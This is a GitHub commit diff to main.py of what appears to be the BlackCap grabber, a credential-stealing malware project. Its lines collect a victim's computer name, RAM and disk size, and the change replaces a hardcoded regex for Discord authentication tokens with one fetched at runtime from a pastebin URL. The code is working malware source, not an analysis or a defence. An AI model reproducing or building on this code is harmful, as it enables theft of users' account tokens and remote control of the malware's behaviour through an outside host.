Update main.py

This commit is contained in:
What about KSCH 2023-02-13 16:00:20 +01:00 committed by GitHub
parent 762d28486f
commit f532ee92fe
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 7 deletions

10
main.py
View File

@ -114,13 +114,9 @@ vctm_pc = os.getenv("COMPUTERNAME")
r4m = str(psutil.virtual_memory()[0] / 1024 ** 3).split(".")[0]
d1sk = str(psutil.disk_usage('/')[0] / 1024 ** 3).split(".")[0]
#BlackCap_Regex = 'https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/reg.txt'
#reg_req = requests.get(BlackCap_Regex)
clear_reg = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
BlackCap_Regex = 'https://pastebin.com/raw/P3vkbQvj'
reg_req = requests.get(BlackCap_Regex)
clear_reg = r"[\w-]{24}\." + reg_req.text